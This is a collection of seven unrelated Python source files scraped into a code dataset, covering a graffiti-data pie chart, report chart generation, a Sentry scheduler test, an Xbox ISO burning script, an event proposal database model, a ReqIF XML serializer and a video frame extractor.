+{"seq_id":"406565538","text":"import os\nimport csv\nimport matplotlib.pyplot as plt\n\n# Original source of data:\n# https://data.cityofnewyork.us/api/views/gpwd-npar/rows.csv?accessType=DOWNLOAD\n# (accessed: 25th July, 2017)\n# Plus an interesting video about graffiti removal in New York City: \n# https://www.youtube.com/watch?v=jrPN3P1pSxU\ndatafile = os.path.dirname(__file__) + '/data/' + 'DSNY_Graffiti_Information.csv'\n\ngraffitis_by_borough = {'BRONX': 0, 'BROOKLYN': 0, 'MANHATTAN': 0, 'QUEENS': 0, 'STATEN ISLAND': 0}\n\nwith open(datafile, 'r') as csvfile:\n rd = csv.reader(csvfile, delimiter=',')\n for row in rd:\n if row[1] == 'BOROUGH':\n continue\n if row[8].find('Property cleaned.') == -1:\n continue\n dt = row[9].split('/')\n if dt[0] != '':\n if dt[2] == '2016' and (dt[0] == '10' or dt[0] == '11' or dt[0] == '12'):\n graffitis_by_borough[row[1]] += 1 \n \nlabels = graffitis_by_borough.keys()\nsizes = list(graffitis_by_borough.values())\n\nfig1, ax1 = plt.subplots()\nplt.title('NYC removed graffitis by boroughs, 4th quarter 2016')\nax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True, startangle=90)\nax1.axis('equal') \n\nplt.show()","sub_path":"dsnygraf1.py","file_name":"dsnygraf1.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"150029490","text":"#-*- coding: utf-8 -*-\n\nfrom db.db_conn import DBManager\nfrom sys import exit\nimport copy\nimport time\n\n\nclass ChartGenerator:\n def __init__(self, formatter=None):\n self.formatter = formatter\n\n def report_charts(self, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, chart_id):\n self._db = DBManager.get_query()\n if chart_id:\n self._db.Query(\"\"\"SELECT report_data_set_chart_id FROM report_data_set_chart\n WHERE element_id=%s AND report_data_set_chart_id = %s\"\"\", (element_id, chart_id))\n else:\n self._db.Query(\"\"\"SELECT report_data_set_chart_id FROM report_data_set_chart\n WHERE element_id=%s AND enabled_ind='Y'\"\"\", (element_id, ))\n for el in self._db.record:\n self.report_chart(el['report_data_set_chart_id'], element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, 'large')\n\n def _strip_total(self, data, bars_or_lines_created_for, index):\n stripped_data = data.copy()\n if bars_or_lines_created_for == 'column headers':\n rows_num = len(stripped_data[index]['rows'])\n if rows_num:\n total_cell = stripped_data[index]['rows'][rows_num - 1][0]['original_val']\n # do not remove TOTAL column if it is the only row besides label column\n if (\n (isinstance(total_cell, str) and total_cell == 'TOTAL') or \\\n (isinstance(total_cell, unicode) and total_cell == u'TOTAL')) and \\\n rows_num > 1:\n del(stripped_data[index]['rows'][rows_num - 1])\n else:\n col_num = len(stripped_data[index]['header'])\n total_cell = stripped_data[index]['header'][col_num - 1]['original_val']\n # do not remove TOTAL row if it is the only row besides label row\n if (\n (isinstance(total_cell, str) and total_cell == 'TOTAL') or \\\n (isinstance(total_cell, unicode) and total_cell == u'TOTAL')) and \\\n col_num > 1:\n del(stripped_data[index]['header'][col_num - 1])\n for i, v in enumerate(stripped_data[index]['rows']):\n del(stripped_data[index]['rows'][i][col_num - 1])\n return stripped_data\n\n def report_chart(self, chart_id, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, type):\n from report_chart import ReportChart\n self._db = DBManager.get_query()\n self._db.Query(\"\"\"SELECT report_data_set_chart_id, bars_or_lines_created_for, report_data_set_pivot_id, name\n FROM report_data_set_chart\n WHERE element_id=%s AND report_data_set_chart_id = %s\"\"\", (element_id, chart_id))\n chart = self._db.record[0]\n if chart['report_data_set_pivot_id']:\n index = chart['report_data_set_pivot_id']\n else:\n index = 0\n #if not data.has_key(index):\n if index not in data:\n raise Exception(\"There is no source data for chart %s (%s)\" % (chart['name'], chart_id))\n\n data_chart = self._strip_total(data, chart['bars_or_lines_created_for'], index)\n _report_chart = ReportChart(chart_id, element_id, segment_value_id, meas_time, data_set_instance_id, data_chart, jfile, type)\n _report_chart.generateChart()\n\n def report_thumbnail(self, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, chart_id):\n self.report_chart(chart_id, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, 'thumbnail')\n\n def report_preview(self, element_id, meas_time, segment_value_id, data_set_instance_id, data, jfile, chart_id):\n self.report_chart(chart_id, element_id, segment_value_id, meas_time, data_set_instance_id, data, jfile, 'preview')\n\n def metric(self, metric_id, interval, data, jfile, type):\n from metric_chart import MetricChart\n metric_chart = MetricChart(metric_id, interval, data, jfile, type, self.formatter)\n return metric_chart.generate_chart()\n\n def metric_chart(self, metric_id, interval, data, jfile):\n return self.metric(metric_id, interval, data, jfile, 'large')\n\n def metric_preview(self, metric_id, interval, data, jfile):\n return self.metric(metric_id, interval, data, jfile, 'preview')\n\n def metric_thumbnail(self, metric_id, interval, data, jfile):\n return self.metric(metric_id, interval, data, jfile, 'thumbnail')\n","sub_path":"chart/chart_generator.py","file_name":"chart_generator.py","file_ext":"py","file_size_in_byte":4594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"511960489","text":"from __future__ import absolute_import, print_function\n\nfrom datetime import timedelta\nfrom django.utils import timezone\nfrom mock import patch\n\nfrom sentry.models import ScheduledJob\nfrom sentry.testutils import TestCase\nfrom sentry.tasks.scheduler import enqueue_scheduled_jobs\n\n\nclass EnqueueScheduledJobsTest(TestCase):\n def test_does_not_schedule_future_job(self):\n sj = ScheduledJob.objects.create(\n name='sentry.tasks.enqueue_scheduled_jobs',\n payload={'foo': 'baz'},\n date_scheduled=timezone.now() + timedelta(days=1),\n )\n\n enqueue_scheduled_jobs()\n\n assert ScheduledJob.objects.filter(\n id=sj.id,\n ).exists()\n\n @patch('sentry.celery.app.send_task')\n def test_schedules_due_job(self, mock_send_task):\n sj = ScheduledJob.objects.create(\n name='sentry.tasks.enqueue_scheduled_jobs',\n payload={'foo': 'bar'},\n date_scheduled=timezone.now(),\n )\n\n enqueue_scheduled_jobs()\n\n assert not ScheduledJob.objects.filter(\n id=sj.id,\n ).exists()\n\n mock_send_task.assert_called_once_with(\n 'sentry.tasks.enqueue_scheduled_jobs',\n kwargs={'foo': 'bar'},\n )\n","sub_path":"tests/sentry/tasks/test_enqueue_scheduled_jobs.py","file_name":"test_enqueue_scheduled_jobs.py","file_ext":"py","file_size_in_byte":1253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"391002882","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nencoding = 'utf-8'\n\nimport os, sys, functions, wx\n\nprint(\"XGD-Burner 0.1 beta\")\nprint(\"Developer: DJYoshaBYD\")\n\nprint(\"Please choose the ISO you want to burn..\")\nINAME = raw_input()\nif INAME == \"\":\n print(\"You need to choose a type in the full path to the ISO you want to burn... Closing.\")\n sys.exit()\n\nprint(\"Have you run the ISO through ABGX360? y/n\")\nabg = raw_input()\nif abg == \"n\":\n print(\"You need to do that before we continue. Exiting...\")\n sys.exit()\n\nprint(\"Checking ISO for size/type\")\nDSIZE = os.path.getsize(INAME)\n\nif DSIZE > 8547991552:\n DTYPE=\"xgd3\"\n print(\"This is an XGD3 disc. Some games do not work when truncated. Do you want to truncate? y/n\")\n trunc = raw_input()\n if trunc == y:\n functions.truncate\n DTYPE=\"xgd3trunc\"\n elif trunc == n:\n print(\"The disc will not work if you are not running an Lite-On iHAS Burner\")\n print(\"Do you wish to continue? y/n\")\n ihas = raw_input()\n if ihas == n:\n print(\"Please try agai with iHAS burner or use truncate AT YOUR OWN RISK\")\n sys.exit()\nelif DSIZE < 8547991552:\n DTYPE=\"xgd2\"\n\nprint(\"Choose your DVD burner. You will need to put /dev/ in front of the drive name\")\nos.system(\"echo dmesg | egrep -i --color 'cdrom|dvd|cd/rw|writer'\")\nDVD = raw_input()\n\nprint(\"Everything looks good. Starting burn process...\")\nfunctions.burn()\n","sub_path":"lib/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1418,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"527387519","text":"from datetime import datetime, timedelta\nfrom collections import namedtuple\nfrom dateutil.parser import parse as parse_date\nimport re\nfrom itertools import groupby\n\nfrom sqlalchemy import UniqueConstraint, func, select\nfrom sqlalchemy.orm import column_property\nfrom slugify import slugify_unicode\nfrom models import export_attr_counts, export_attr_edits, export_intervals, bucketise\n\nfrom main import db\nfrom .user import User\n\n# state: [allowed next state, ] pairs\nCFP_STATES = { 'edit': ['accepted', 'rejected', 'new'],\n 'new': ['accepted', 'rejected', 'checked', 'manual-review'],\n 'checked': ['accepted', 'rejected', 'anonymised', 'anon-blocked', 'edit'],\n 'rejected': ['accepted', 'rejected', 'edit'],\n 'cancelled': ['accepted', 'rejected', 'edit'],\n 'anonymised': ['accepted', 'rejected', 'reviewed', 'edit'],\n 'anon-blocked': ['accepted', 'rejected', 'reviewed', 'edit'],\n 'reviewed': ['accepted', 'rejected', 'edit'],\n 'manual-review': ['accepted', 'rejected', 'edit'],\n 'accepted': ['accepted', 'rejected', 'finished'],\n 'finished': ['rejected', 'finished'] }\n\n# Most of these states are the same they're kept distinct for semantic reasons\n# and because I'm lazy\nVOTE_STATES = {'new': ['voted', 'recused', 'blocked'],\n 'voted': ['resolved', 'stale'],\n 'recused': ['resolved', 'stale'],\n 'blocked': ['resolved', 'stale'],\n 'resolved': ['voted', 'recused', 'blocked'],\n 'stale': ['voted', 'recused', 'blocked'],\n }\n\n# Lengths for talks and workshops as displayed to the user\nLENGTH_OPTIONS = [('< 10 mins', \"Shorter than 10 minutes\"),\n ('10-25 mins', \"10-25 minutes\"),\n ('25-45 mins', \"25-45 minutes\"),\n ('> 45 mins', \"Longer than 45 minutes\")]\n\n# What we consider these as when scheduling\nROUGH_LENGTHS = {'> 45 mins': 60,\n '25-45 mins': 30,\n '10-25 mins': 20,\n '< 10 mins': 10\n }\n\n# These are the time periods speakers can select as being available in the form\nperiod = namedtuple('Period', 'start end')\nTIME_PERIODS = {\n 'fri_13_16': period(datetime(2018, 8, 31, 14, 0), datetime(2018, 8, 31, 16, 0)),\n 'fri_16_20': period(datetime(2018, 8, 31, 16, 0), datetime(2018, 8, 31, 20, 0)),\n 'sat_10_13': period(datetime(2018, 9, 1, 10, 0), datetime(2018, 9, 1, 13, 0)),\n 'sat_13_16': period(datetime(2018, 9, 1, 13, 0), datetime(2018, 9, 1, 16, 0)),\n 'sat_16_20': period(datetime(2018, 9, 1, 16, 0), datetime(2018, 9, 1, 20, 0)),\n 'sun_10_13': period(datetime(2018, 9, 2, 10, 0), datetime(2018, 9, 2, 13, 0)),\n 'sun_13_16': period(datetime(2018, 9, 2, 13, 0), datetime(2018, 9, 2, 16, 0)),\n 'sun_16_20': period(datetime(2018, 9, 2, 16, 0), datetime(2018, 9, 2, 20, 0)),\n}\n\n# We may also have other venues in the DB, but these are the ones to be\n# returned by default if there are none\nDEFAULT_VENUES = {\n 'talk': ['Stage A', 'Stage B', 'Stage C'],\n 'workshop': ['Workshop 1', 'Workshop 2'],\n 'youthworkshop': ['Workshop 3'],\n 'performance': ['Stage A'],\n 'installation': [],\n}\n\n# List of submission types which are manually reviewed rather than through\n# the anonymous review system.\nMANUAL_REVIEW_TYPES = ['youthworkshop', 'performance', 'installation']\n\n\nclass CfpStateException(Exception):\n pass\n\nclass InvalidVenueException(Exception):\n pass\n\n\nFavouriteProposal = db.Table('favourite_proposal', db.Model.metadata,\n db.Column('user_id', db.Integer, db.ForeignKey('user.id'), primary_key=True),\n db.Column('proposal_id', db.Integer, db.ForeignKey('proposal.id'), primary_key=True),\n)\n\nclass Proposal(db.Model):\n __versioned__ = {'exclude': ['favourites']}\n __tablename__ = 'proposal'\n\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n anonymiser_id = db.Column(db.Integer, db.ForeignKey('user.id'), default=None)\n created = db.Column(db.DateTime, default=datetime.utcnow, nullable=False)\n modified = db.Column(db.DateTime, default=datetime.utcnow, nullable=False, onupdate=datetime.utcnow)\n state = db.Column(db.String, nullable=False, default='new')\n type = db.Column(db.String, nullable=False) # talk, workshop or installation\n\n # Core information\n title = db.Column(db.String, nullable=False)\n description = db.Column(db.String, nullable=False)\n requirements = db.Column(db.String)\n length = db.Column(db.String) # only used for talks and workshops\n notice_required = db.Column(db.String)\n\n # Flags\n needs_help = db.Column(db.Boolean, nullable=False, default=False)\n needs_money = db.Column(db.Boolean, nullable=False, default=False)\n one_day = db.Column(db.Boolean, nullable=False, default=False)\n has_rejected_email = db.Column(db.Boolean, nullable=False, default=False)\n\n # References to this table\n messages = db.relationship('CFPMessage', backref='proposal')\n votes = db.relationship('CFPVote', backref='proposal')\n favourites = db.relationship(User, secondary=FavouriteProposal, backref=db.backref('favourites'))\n\n # Convenience for individual objects. Use an outerjoin and groupby for more than a few records\n favourite_count = column_property(select([func.count(FavouriteProposal.c.proposal_id)]).where(\n FavouriteProposal.c.proposal_id == id,\n ), deferred=True)\n\n # Fields for finalised info\n published_names = db.Column(db.String)\n arrival_period = db.Column(db.String)\n departure_period = db.Column(db.String)\n telephone_number = db.Column(db.String)\n may_record = db.Column(db.Boolean)\n needs_laptop = db.Column(db.Boolean)\n available_times = db.Column(db.String)\n\n # Fields for scheduling\n allowed_venues = db.Column(db.String, nullable=True)\n allowed_times = db.Column(db.String, nullable=True)\n scheduled_duration = db.Column(db.Integer, nullable=True)\n scheduled_time = db.Column(db.DateTime, nullable=True)\n scheduled_venue_id = db.Column(db.Integer, db.ForeignKey('venue.id'))\n potential_time = db.Column(db.DateTime, nullable=True)\n potential_venue_id = db.Column(db.Integer, db.ForeignKey('venue.id'))\n\n scheduled_venue = db.relationship('Venue', backref='proposals', cascade='all',\n primaryjoin='Venue.id == Proposal.scheduled_venue_id')\n potential_venue = db.relationship('Venue',\n primaryjoin='Venue.id == Proposal.potential_venue_id')\n\n __mapper_args__ = {'polymorphic_on': type}\n\n @classmethod\n def get_export_data(cls):\n if cls.__name__ == 'Proposal':\n # Export stats for each proposal type separately\n return {}\n\n count_attrs = ['needs_help', 'needs_money', 'needs_laptop',\n 'one_day', 'notice_required', 'may_record', 'state']\n\n edits_attrs = ['title', 'description', 'requirements', 'length',\n 'notice_required', 'needs_help', 'needs_money', 'one_day',\n 'has_rejected_email', 'published_names', 'arrival_period',\n 'departure_period', 'telephone_number', 'may_record',\n 'needs_laptop', 'available_times',\n 'attendees', 'cost', 'size', 'funds',\n 'age_range', 'participant_equipment']\n\n proposals = cls.query.with_entities(\n cls.id, cls.title, cls.description,\n cls.favourite_count, # don't care about performance here\n cls.length, cls.notice_required, cls.needs_money,\n cls.available_times, cls.allowed_times,\n cls.arrival_period, cls.departure_period,\n cls.needs_laptop, cls.may_record,\n ).order_by(cls.id)\n\n if cls.__name__ == 'WorkshopProposal':\n proposals = proposals.add_columns(cls.attendees, cls.cost)\n elif cls.__name__ == 'InstallationProposal':\n proposals = proposals.add_columns(cls.size, cls.funds)\n elif cls.__name__ == 'YouthWorkshopProposal':\n proposals = proposals.add_columns(cls.attendees, cls.cost, cls.age_range, cls.participant_equipment)\n\n # Some unaccepted proposals have scheduling data, but we shouldn't need to keep that\n accepted_columns = (\n User.name, User.email, cls.published_names,\n cls.scheduled_time, cls.scheduled_duration, Venue.name,\n )\n accepted_proposals = proposals.filter(cls.state.in_(['accepted', 'finished'])) \\\n .outerjoin(cls.scheduled_venue) \\\n .join(cls.user) \\\n .add_columns(*accepted_columns)\n\n other_proposals = proposals.filter(~cls.state.in_(['accepted', 'finished']))\n\n user_favourites = cls.query.filter(cls.state.in_(['accepted', 'finished'])) \\\n .join(cls.favourites) \\\n .with_entities(User.id.label('user_id'), cls.id) \\\n .order_by(User.id)\n\n anon_favourites = []\n for user_id, proposals in groupby(user_favourites, lambda r: r.user_id):\n anon_favourites.append([p.id for p in proposals])\n anon_favourites.sort()\n\n public_columns = (\n cls.title, cls.description,\n cls.published_names.label('names'), cls.may_record,\n cls.scheduled_time, cls.scheduled_duration, Venue.name.label('venue'),\n )\n accepted_public = cls.query.filter(cls.state.in_(['accepted', 'finished'])) \\\n .outerjoin(cls.scheduled_venue) \\\n .with_entities(*public_columns)\n\n favourite_counts = [p.favourite_count for p in proposals]\n\n data = {\n 'private': {\n 'proposals': {\n 'accepted_proposals': accepted_proposals,\n 'other_proposals': other_proposals,\n },\n 'favourites': anon_favourites,\n },\n 'public': {\n 'proposals': {\n 'counts': export_attr_counts(cls, count_attrs),\n 'edits': export_attr_edits(cls, edits_attrs),\n 'accepted': accepted_public,\n },\n 'favourites': {\n 'counts': bucketise(favourite_counts, [0, 1, 10, 20, 30, 40, 50, 100, 200]),\n },\n },\n 'tables': ['proposal', 'proposal_version', 'favourite_proposal', 'favourite_proposal_version'],\n }\n data['public']['proposals']['counts']['created_week'] = export_intervals(cls.query, cls.created, 'week', 'YYYY-MM-DD')\n\n return data\n\n def get_user_vote(self, user):\n # there can't be more than one vote per user per proposal\n return CFPVote.query.filter_by(proposal_id=self.id, user_id=user.id)\\\n .first()\n\n def set_state(self, state):\n state = state.lower()\n if state not in CFP_STATES:\n raise CfpStateException('\"%s\" is not a valid state' % state)\n\n if state not in CFP_STATES[self.state]:\n raise CfpStateException('\"%s->%s\" is not a valid transition' % (self.state, state))\n\n self.state = state\n\n def get_unread_vote_note_count(self):\n return len([v for v in self.votes if not v.has_been_read])\n\n def get_total_note_count(self):\n return len([v for v in self.votes if v.note and len(v.note) > 0])\n\n def get_unread_messages(self, user):\n return [m for m in self.messages if (not m.has_been_read and\n m.is_user_recipient(user))]\n\n def get_unread_count(self, user):\n return len(self.get_unread_messages(user))\n\n def mark_messages_read(self, user):\n messages = self.get_unread_messages(user)\n for msg in messages:\n msg.has_been_read = True\n db.session.commit()\n return len(messages)\n\n def has_ticket(self):\n \" Does the submitter have a ticket? \"\n admission_tickets = len(list(self.user.get_owned_tickets(paid=True, type='admission_ticket')))\n return admission_tickets > 0 or self.user.will_have_ticket\n\n def get_allowed_venues(self):\n if self.allowed_venues:\n venue_names = [ v.strip() for v in self.allowed_venues.split(',') ]\n else:\n venue_names = DEFAULT_VENUES[self.type]\n\n found = Venue.query.filter(Venue.name.in_(venue_names)).all()\n # If we didn't actually find all the venues we're using, bail hard\n if len(found) != len(venue_names):\n raise InvalidVenueException(\"Invalid Venue in allowed_venues!\")\n\n return found\n\n def get_allowed_venues_serialised(self):\n return ','.join([ v.name for v in self.get_allowed_venues() ])\n\n # Reduces the time periods to the smallest contiguous set we can\n def make_periods_contiguous(self, time_periods):\n if not time_periods:\n return []\n\n time_periods.sort(key=lambda x: x.start)\n contiguous_periods = [time_periods.pop(0)]\n for time_period in time_periods:\n if time_period.start <= contiguous_periods[-1].end and\\\n contiguous_periods[-1].end < time_period.end:\n contiguous_periods[-1] = period(contiguous_periods[-1].start, time_period.end)\n continue\n\n contiguous_periods.append(time_period)\n return contiguous_periods\n\n def get_allowed_time_periods(self):\n time_periods = []\n\n if self.allowed_times:\n for p in self.allowed_times.split('\\n'):\n if p:\n start, end = p.split(' > ')\n time_periods.append(\n period(\n parse_date(start),\n parse_date(end),\n )\n )\n\n # If we've not overridden it, use the user-specified periods\n if not time_periods and self.available_times:\n for p in self.available_times.split(','):\n if p:\n time_periods.append(TIME_PERIODS[p.strip()])\n return self.make_periods_contiguous(time_periods)\n\n def get_allowed_time_periods_serialised(self):\n return '\\n'.join([ \"%s > %s\" % (v.start, v.end) for v in self.get_allowed_time_periods() ])\n\n def get_allowed_time_periods_with_default(self):\n allowed_time_periods = self.get_allowed_time_periods()\n if not allowed_time_periods:\n allowed_time_periods = list(TIME_PERIODS.values())\n return self.make_periods_contiguous(allowed_time_periods)\n\n @property\n def end_date(self):\n start = self.scheduled_time\n duration = self.scheduled_duration\n if start and duration:\n return start + timedelta(minutes=int(duration))\n return None\n\n @property\n def slug(self):\n slug = slugify_unicode(self.title).lower()\n if len(slug) > 60:\n words = re.split(' +|[,.;:!?]+', self.title)\n break_words = ['and', 'which', 'with', 'without', 'for', '-', '']\n\n for i, word in reversed(list(enumerate(words))):\n new_slug = slugify_unicode(' '.join(words[:i])).lower()\n if word in break_words:\n if len(new_slug) > 10 and not len(new_slug) > 60:\n slug = new_slug\n break\n\n elif len(slug) > 60 and len(new_slug) > 10:\n slug = new_slug\n\n if len(slug) > 60:\n slug = slug[:60] + '-'\n\n return slug\n\n @property\n def latlon(self):\n if self.scheduled_venue.lat and self.scheduled_venue.lon:\n return [self.scheduled_venue.lat, self.scheduled_venue.lon]\n return None\n\n @property\n def map_link(self):\n latlon = self.latlon\n if latlon:\n return 'https://map.emfcamp.org/?lat=%s&lon=%s&title=%s#19/%s/%s' % (latlon[0], latlon[1], self.scheduled_venue.name, latlon[0], latlon[1])\n return None\n\nclass PerformanceProposal(Proposal):\n __mapper_args__ = {'polymorphic_identity': 'performance'}\n human_type = 'performance'\n\n\nclass TalkProposal(Proposal):\n __mapper_args__ = {'polymorphic_identity': 'talk'}\n human_type = 'talk'\n\n\nclass WorkshopProposal(Proposal):\n __mapper_args__ = {'polymorphic_identity': 'workshop'}\n human_type = 'workshop'\n attendees = db.Column(db.String)\n cost = db.Column(db.String)\n age_range = db.Column(db.String)\n participant_equipment = db.Column(db.String)\n\n\nclass YouthWorkshopProposal(WorkshopProposal):\n __mapper_args__ = {'polymorphic_identity': 'youthworkshop'}\n human_type = 'youth workshop'\n valid_dbs = db.Column(db.Boolean, nullable=False, default=False)\n\n\nclass InstallationProposal(Proposal):\n __mapper_args__ = {'polymorphic_identity': 'installation'}\n human_type = 'installation'\n size = db.Column(db.String)\n funds = db.Column(db.String, nullable=True)\n\n\nclass CFPMessage(db.Model):\n __tablename__ = 'cfp_message'\n id = db.Column(db.Integer, primary_key=True)\n created = db.Column(db.DateTime, default=datetime.utcnow)\n from_user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n proposal_id = db.Column(db.Integer, db.ForeignKey('proposal.id'), nullable=False)\n\n message = db.Column(db.String, nullable=False)\n # Flags\n is_to_admin = db.Column(db.Boolean)\n has_been_read = db.Column(db.Boolean, default=False)\n\n def is_user_recipient(self, user):\n \"\"\"\n Because we want messages from proposers to be visible to all admin\n we need to infer the 'to' portion of the email, either it is\n to the proposer (from admin) or to admin (& from the proposer).\n\n Obviously if the proposer is also an admin this doesn't really work\n but equally they should know where to ask.\n \"\"\"\n is_user_admin = user.has_permission('cfp_admin')\n is_user_proposer = user.id == self.proposal.user_id\n\n if is_user_proposer and not self.is_to_admin:\n return True\n\n if is_user_admin and self.is_to_admin:\n return True\n\n return False\n\n @classmethod\n def get_export_data(cls):\n count_attrs = ['has_been_read']\n\n message_contents = cls.query.join(User).with_entities(\n cls.proposal_id, User.email.label('from_user_email'), User.name.label('from_user_name'),\n cls.is_to_admin, cls.has_been_read, cls.message,\n ).order_by(cls.id)\n\n data = {\n 'private': {\n 'message': message_contents,\n },\n 'public': {\n 'messages': {\n 'counts': export_attr_counts(cls, count_attrs),\n },\n },\n 'tables': ['cfp_message', 'cfp_message_version'],\n }\n data['public']['messages']['counts']['created_day'] = export_intervals(cls.query, cls.created, 'day', 'YYYY-MM-DD')\n\n return data\n\n\nclass CFPVote(db.Model):\n __versioned__ = {}\n __tablename__ = 'cfp_vote'\n id = db.Column(db.Integer, primary_key=True)\n user_id = db.Column(db.Integer, db.ForeignKey('user.id'), nullable=False)\n proposal_id = db.Column(db.Integer, db.ForeignKey('proposal.id'), nullable=False)\n state = db.Column(db.String, nullable=False)\n has_been_read = db.Column(db.Boolean, nullable=False, default=False)\n\n created = db.Column(db.DateTime, nullable=False, default=datetime.utcnow)\n modified = db.Column(db.DateTime, nullable=False, default=datetime.utcnow, onupdate=datetime.utcnow)\n\n vote = db.Column(db.Integer) # Vote can be null for abstentions\n note = db.Column(db.String)\n\n def __init__(self, user, proposal):\n self.user = user\n self.proposal = proposal\n self.state = 'new'\n\n def set_state(self, state):\n state = state.lower()\n if state not in VOTE_STATES:\n raise CfpStateException('\"%s\" is not a valid state' % state)\n\n if state not in VOTE_STATES[self.state]:\n raise CfpStateException('\"%s->%s\" is not a valid transition' % (self.state, state))\n\n self.state = state\n\n @classmethod\n def get_export_data(cls):\n count_attrs = ['state', 'has_been_read', 'vote']\n edits_attrs = ['state', 'vote', 'note']\n\n data = {\n 'public': {\n 'votes': {\n 'counts': export_attr_counts(cls, count_attrs),\n 'edits': export_attr_edits(cls, edits_attrs),\n },\n },\n 'tables': ['cfp_vote', 'cfp_vote_version'],\n }\n data['public']['votes']['counts']['created_day'] = export_intervals(cls.query, cls.created, 'day', 'YYYY-MM-DD')\n\n return data\n\n\nclass Venue(db.Model):\n __tablename__ = 'venue'\n __export_data__ = False\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String, nullable=False)\n type = db.Column(db.String, nullable=True)\n priority = db.Column(db.Integer, nullable=True, default=0)\n lat = db.Column(db.Float)\n lon = db.Column(db.Float)\n\n __table_args__ = (\n UniqueConstraint('name', name='_venue_name_uniq'),\n )\n\n def __repr__(self):\n return \"\".format(self.id, self.name)\n\n\n# TODO: change the relationships on User and Proposal to 1-to-1\ndb.Index('ix_cfp_vote_user_id_proposal_id', CFPVote.user_id, CFPVote.proposal_id, unique=True)\n","sub_path":"models/cfp.py","file_name":"cfp.py","file_ext":"py","file_size_in_byte":21734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"148977607","text":"from xml.etree.ElementTree import Element\nfrom .. import TReqz\n\n\nclass reqif_specification(TReqz.reqif_identifiable):\n\n def __init__(self, content: Element = None, id_dict=None):\n self.values: list = list() # reqif_attribute_value\n self.children: list = list() # reqif_spec_hierarchy\n self.type: TReqz.reqif_specification_type = None # localRef, required\n super(reqif_specification, self).__init__(content, id_dict)\n self.name = \"SPECIFICATION\"\n\n def decode(self, content: Element, id_dict: TReqz.reqif_id_dict = None):\n super().decode(content, id_dict)\n namespace = TReqz.xml_utils.get_tag_namespace(content.tag)\n\n self.values = TReqz.reqif_utils.generate_object_list_by_element_class(\n content, id_dict, \"./{0}VALUES\".format(namespace), TReqz.reqif_config.ATTRIBUTE_VALUE_TAG_TO_CLASS)\n\n self.children = TReqz.reqif_utils.generate_object_list_by_element_class(\n content, id_dict, \"./{0}CHILDREN\".format(namespace), TReqz.reqif_config.SPEC_HIERARCHY_TAG_TO_CLASS)\n\n self.type = TReqz.reqif_utils.get_local_ref_from_element_text(\n content, id_dict, \"./{0}TYPE/{0}SPECIFICATION-TYPE-REF\".format(namespace))\n\n def encode(self):\n elem = super().encode()\n elem.tag = self.name\n\n if self.values!= None and len(self.values) > 0:\n valuesElement = TReqz.xml_utils.addRequiredSubElement(\n elem, \"VALUES\")\n for value in self.values:\n TReqz.xml_utils.addEncodedSubElement(valuesElement, value)\n\n if self.children != None and len(self.children) > 0:\n childrenElement = TReqz.xml_utils.addRequiredSubElement(\n elem, \"CHILDREN\")\n for child in self.children:\n TReqz.xml_utils.addEncodedSubElement(childrenElement, child)\n\n if self.type != None:\n typeElement = TReqz.xml_utils.addRequiredSubElement(elem, \"TYPE\")\n TReqz.xml_utils.addRequiredSubElement(\n typeElement, \"SPECIFICATION-TYPE-REF\", self.type.identifier)\n\n return elem\n","sub_path":"TReqz/reqif_specification.py","file_name":"reqif_specification.py","file_ext":"py","file_size_in_byte":2111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"442644833","text":"import cv2\nimport numpy as np\n\n# root = './' + input('Input the dataset folder: ')\n# filename = root + input(\"Please input the filename: \")\n# directory = root + input(\"Please input the desired directory name: \") + \"/\"\nfilename = \"./vid2.mp4\"\ndirectory = \"./HB/HB09/\"\ncap = cv2.VideoCapture(filename)\n\nif cap.isOpened() is not True:\n print(\"Error with opening the provided file\")\n\ncurrent_frame = 1\ntrack = 1\nwhile cap.isOpened():\n # Capture frame-by-frame\n if track < 150:\n ret, frame = cap.read()\n track += 1\n else:\n ret, frame = cap.read()\n if ret:\n\n # Display the resulting frame\n cv2.imshow('Frame', frame)\n current_filename = directory + \"%06d.jpg\" % current_frame\n cv2.imwrite(current_filename, frame)\n current_frame += 1\n\n # Press Q on keyboard to exit\n if cv2.waitKey(25) & 0xFF == ord('q'):\n break\n\n# When everything done, release the video capture object\ncap.release()\n\n# Closes all the frames\ncv2.destroyAllWindows()\n","sub_path":"data/format_data.py","file_name":"format_data.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
